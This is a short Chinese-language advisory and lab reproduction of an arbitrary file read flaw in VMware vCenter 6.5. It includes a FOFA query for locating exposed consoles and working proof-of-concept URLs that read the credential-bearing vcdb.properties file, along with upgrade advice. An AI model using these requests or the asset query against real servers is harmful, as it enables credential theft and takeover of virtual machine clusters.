1.影响版本
VMware vCenter Server 6.5.0a至f版本(之前版本也可能受影响)
2.资产查找
FOFA:title="ID_VC_Welcome"
3.漏洞描述
VMware vCenter存在任意文件读取漏洞,远程攻击者通过访问开放在外部的vCenter 控制台,可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理帐号密码)进而控制 vCenter 平台及其管理的虚拟机集群。
4.漏洞POC
1)https://主机地址/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
2)https://主机地址/eam/vib?id=C:/windows/win.ini
5.漏洞复现
1)在服务器部署vcenter-server,通过浏览器访问vCenter控制台
https://192.168.210.152/vsphere-client/?csp
2)访问漏洞POC
https://192.168.210.152/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
https://192.168.210.152/eam/vib?id=C:/windows/win.ini
6.修复建议
Vmware 确认该漏洞已在 6.5u1 版本中修复,请尽快升级至安全版本或更高版本。